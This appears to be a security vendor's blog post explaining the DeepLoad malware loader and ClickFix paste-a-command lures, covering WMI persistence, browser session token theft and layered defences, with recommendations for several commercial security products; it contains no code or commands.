A New Loader, A Familiar Trick
Researchers at ReliaQuest have identified an active campaign distributing a previously undocumented malware loader called DeepLoad. The delivery mechanism is ClickFix — a social engineering tactic that tricks users into manually executing malicious commands on their own machines. The payload arrives before most defences have a chance to fire. ClickFix has been circulating in various forms since 2024, but DeepLoad represents a meaningful escalation. The loader appears to incorporate AI-assisted obfuscation, which allows it to evade static scanning tools that rely on known signatures. Once inside, credential theft begins immediately — capturing passwords and session tokens stored in browsers, even if the primary loader itself is subsequently blocked or removed. This is the pattern worth paying attention to: the attack is designed so that even a partial block still results in data loss. That changes the calculus for defenders significantly.
How Does a ClickFix Attack Actually Work?
ClickFix attacks follow a consistent sequence. A user encounters a webpage, document, or CAPTCHA prompt that instructs them to 'fix' an error by copying a command and pasting it into the Windows Run dialogue or PowerShell terminal. The command is obfuscated — it looks like a verification step, not a script execution. Users comply because the prompt appears legitimate. Once that command runs, the loader downloads and executes the DeepLoad payload. From that point, the malware uses Windows Management Instrumentation (WMI) to establish persistence. WMI is a legitimate Windows component used for system management tasks, which makes it a popular hiding place for attackers. Security tools that focus on file-based detection often miss WMI-based persistence entirely because no traditional executable is written to disk in the conventional sense. What makes DeepLoad particularly awkward to handle is the sequencing. Credential theft — targeting saved passwords and active session cookies across Chrome, Edge, Firefox, and similar browsers — begins during the initial execution window. By the time an endpoint protection tool raises an alert, the credentials may already be on their way out.
Why Static Scanning Is Not Enough Against This Threat
Traditional endpoint protection works by matching code against a library of known malicious signatures. It is reliable against known threats. Against something like DeepLoad, which ReliaQuest assesses as likely using AI-generated obfuscation to randomise its code structure, signature matching struggles. This is not a new problem — obfuscation has been a standard attacker technique for years. What is new is the scale and sophistication at which AI tooling allows threat actors to generate novel variants. The same obfuscation logic that security vendors use to write detection rules is now available to attackers to evade them. The practical consequence: organisations that rely solely on traditional antivirus or basic endpoint protection are operating with a meaningful detection gap against this class of loader. Behavioural detection — monitoring what a process does rather than what it looks like — is where the advantage shifts back to defenders. Tools like ESET's multi-layered endpoint protection, which combines signature detection with behavioural analysis and exploit blocking, are far better positioned to catch DeepLoad's process injection behaviour than signature-only solutions. For UK organisations, Coro's unified endpoint and email security provides a similar behavioural layer, particularly valuable for mid-market businesses without a dedicated security operations team.
WMI Persistence: Why Rebooting Won't Save You
Once DeepLoad establishes persistence via WMI, a simple reboot does nothing to remove it. WMI event subscriptions — the mechanism attackers use here — survive reboots by design. They are part of Windows' own operational fabric. An attacker who has achieved WMI persistence can re-execute their payload every time the machine starts, every time a user logs in, or on a time-based schedule. The infection continues silently unless someone actively looks for and removes the WMI subscription itself. This is exactly the kind of threat that managed detection and response services are built to find. Sophos MDR, for example, operates 24 hours a day monitoring for precisely these behavioural indicators — anomalous WMI event subscriptions, unexpected process injection, outbound connections to suspicious infrastructure. A well-tuned MDR service hunting across endpoints will surface WMI-based persistence where an automated scan may not.
- WMI event subscriptions persist across reboots — simply restarting an infected machine achieves nothing
- The technique is fileless in nature, meaning traditional file-based detection has limited visibility
- Manual forensic investigation or behavioural monitoring is required to identify and remove the persistence mechanism
- Affected credentials must be treated as compromised and rotated immediately, regardless of whether the loader is removed
What Happens to the Stolen Credentials?
Browser credential theft feeds directly into several downstream attack chains. Stolen session tokens are particularly valuable because they bypass multi-factor authentication entirely — the attacker inherits an already-authenticated session without needing the user's password or second factor. In practice, this means that even organisations with MFA deployed across their accounts face meaningful risk. A stolen session token for a Microsoft 365 account gives an attacker access to email, SharePoint, Teams, and connected applications for the duration of that session. Modern attackers know how to refresh and extend sessions to prolong access. Stolen credentials and session tokens from initial-access brokers regularly appear on criminal marketplaces within hours of compromise. From there, they are sold to ransomware operators or used directly for business email compromise. The window between initial infection and downstream damage can be extremely short. This is where anti-data exfiltration tooling earns its value. BlackFog's ADX technology monitors for and blocks the outbound transfer of credential data and sensitive files in real time — acting at the point of exfiltration rather than relying solely on blocking the initial infection. Even if a loader executes, BlackFog can prevent the stolen data from leaving the device.
How to Reduce Your Exposure to DeepLoad and ClickFix Campaigns
No single control eliminates this threat, but a layered approach closes most of the attack surface that ClickFix and DeepLoad exploit. The first line of defence is user awareness. ClickFix relies entirely on a user choosing to execute a command. Employees who understand that no legitimate website, software update, or CAPTCHA will ever ask them to paste commands into PowerShell are far harder to compromise. That said, social engineering is effective precisely because it is convincing — awareness training reduces risk but does not eliminate it. On the technical side, restricting PowerShell execution policy to signed scripts, and limiting which users can run administrative commands, removes a significant portion of ClickFix's delivery mechanism. Application control policies that prevent unsigned or unexpected executables from running add another barrier. For ongoing monitoring, organisations should ensure their security tooling has visibility into WMI activity. Sophos XDR, for example, provides cross-layer detection across endpoints, email, and network traffic — the kind of correlated view that makes WMI-based persistence visible as an anomaly rather than routine system noise. Attack surface management is also relevant here. Hadrian's continuous external assessment identifies exposed assets and misconfigured services that attackers might use as initial lure infrastructure — phishing pages, lookalike domains, and similar staging resources that ClickFix campaigns depend on.
- Train staff to recognise and refuse requests to paste commands into PowerShell or the Run dialogue
- Restrict PowerShell execution policy to signed scripts and limit administrative command access
- Deploy behavioural endpoint protection with process injection and WMI monitoring capability
- Implement anti-data exfiltration tooling to block credential data leaving the device even if initial execution occurs
- Ensure MDR or SOC coverage provides 24/7 visibility into endpoint and network behavioural anomalies
- Treat any suspected compromise as a full credential rotation event — do not assume partial blocking means partial safety
The Broader Pattern This Campaign Reveals
DeepLoad is not an isolated development. It reflects a broader trend in which attackers combine low-tech social engineering with technically sophisticated payloads. ClickFix works because it sidesteps automated defences entirely — it asks the user to be the execution mechanism. No email filter, no web proxy, no endpoint tool can catch a user who has been convinced to act. Meanwhile, the technical components — AI-assisted obfuscation, WMI persistence, fileless execution, immediate credential theft — are each designed to survive or delay detection at every subsequent layer. The organisations that weather this kind of campaign are those that have accepted a core principle: prevention alone is insufficient. Detection speed and response capability determine the difference between an incident that is contained quickly and one that results in ransomware deployment, data breach notification, or regulatory action under the UK GDPR or New Zealand's Privacy Act 2020. For Australasian businesses, our endpoint security capabilities via ESET provide the behavioural detection depth that campaigns like DeepLoad demand — paired with the managed visibility needed to act on alerts before damage compounds. The full picture of your exposure, including third-party and supply chain risk that might introduce ClickFix lure infrastructure, is something Panorays is specifically built to assess. The threat is not abstract. DeepLoad is active now. The question is not whether organisations in your sector will be targeted — it is whether your current stack would detect it in time to matter.
Frequently Asked Questions
What is a ClickFix attack and how does it bypass security tools?
A ClickFix attack tricks users into manually copying and pasting a malicious command into Windows PowerShell or the Run dialogue, typically by disguising it as a verification or error-fix step. Because the user executes the command themselves, automated email filters and web proxies have no opportunity to intercept it. The payload runs with the user's own permissions, bypassing many conventional controls.
How does WMI persistence work and why is it difficult to detect?
Windows Management Instrumentation (WMI) is a legitimate Windows component that attackers can abuse to schedule code execution — on startup, login, or a timed interval. Because WMI subscriptions use built-in Windows functionality rather than dropping files in the traditional sense, signature-based detection tools frequently miss them. Removing WMI persistence requires active forensic investigation, not simply rebooting or deleting files.
Can multi-factor authentication protect against DeepLoad credential theft?
MFA protects against password theft but not against stolen session tokens. DeepLoad targets session cookies stored in browsers, which represent already-authenticated sessions. An attacker who obtains a valid session token can access accounts directly without entering a password or MFA code. Organisations should deploy anti-data exfiltration tooling and ensure rapid session revocation capability alongside MFA enforcement.